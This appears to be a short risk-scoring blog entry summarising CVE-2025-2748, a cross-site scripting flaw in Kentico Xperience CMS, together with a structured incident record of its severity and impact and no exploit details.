Vulnerability cyber

Kentico

Apr 2, 2025 1 min read
Kentico

Kentico Xperience CMS, an enterprise content management system, has been compromised by exploiting a Cross-Site Scripting (XSS) vulnerability, identified as CVE-2025-2748, affecting versions up to 13.0.178. This vulnerability has enabled attackers to conduct unauthorized resource fetching and temporary file uploads, allowing them to execute remote code. Such actions could result in unauthorized access to sensitive data, session hijacking, and potentially full server compromise, posing serious threats to the integrity and confidentiality of the data managed by the CMS.

Source: https://cybersecuritynews.com/kentico-xperience-cms-xss-vulnerability/

TPRM report: https://scoringcyber.rankiteo.com/company/kentico-software

"id": "ken021040225",
"linkid": "kentico-software",
"type": "Vulnerability",
"date": "4/2025",
"severity": "100",
"impact": "",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': 'Software',
                        'name': 'Kentico Xperience CMS',
                        'type': 'Enterprise Content Management System'}],
 'attack_vector': 'Unauthorized resource fetching, temporary file uploads, '
                  'remote code execution',
 'description': 'Kentico Xperience CMS, an enterprise content management '
                'system, has been compromised by exploiting a Cross-Site '
                'Scripting (XSS) vulnerability, identified as CVE-2025-2748, '
                'affecting versions up to 13.0.178. This vulnerability has '
                'enabled attackers to conduct unauthorized resource fetching '
                'and temporary file uploads, allowing them to execute remote '
                'code. Such actions could result in unauthorized access to '
                'sensitive data, session hijacking, and potentially full '
                'server compromise, posing serious threats to the integrity '
                'and confidentiality of the data managed by the CMS.',
 'impact': {'data_compromised': 'Sensitive data, session hijacking, full '
                                'server compromise',
            'systems_affected': 'Kentico Xperience CMS'},
 'title': 'Kentico Xperience CMS Compromised by XSS Vulnerability '
          '(CVE-2025-2748)',
 'type': 'Cross-Site Scripting (XSS)',
 'vulnerability_exploited': 'CVE-2025-2748'}
Published by
Jeremy C
Jeremy C
You might also like
Great! Next, complete checkout for full access to Rankiteo Blog.
Welcome back! You've successfully signed in.
You've successfully subscribed to Rankiteo Blog.
Success! Your account is fully activated, you now have access to all content.
Success! Your billing info has been updated.
Your billing was not updated.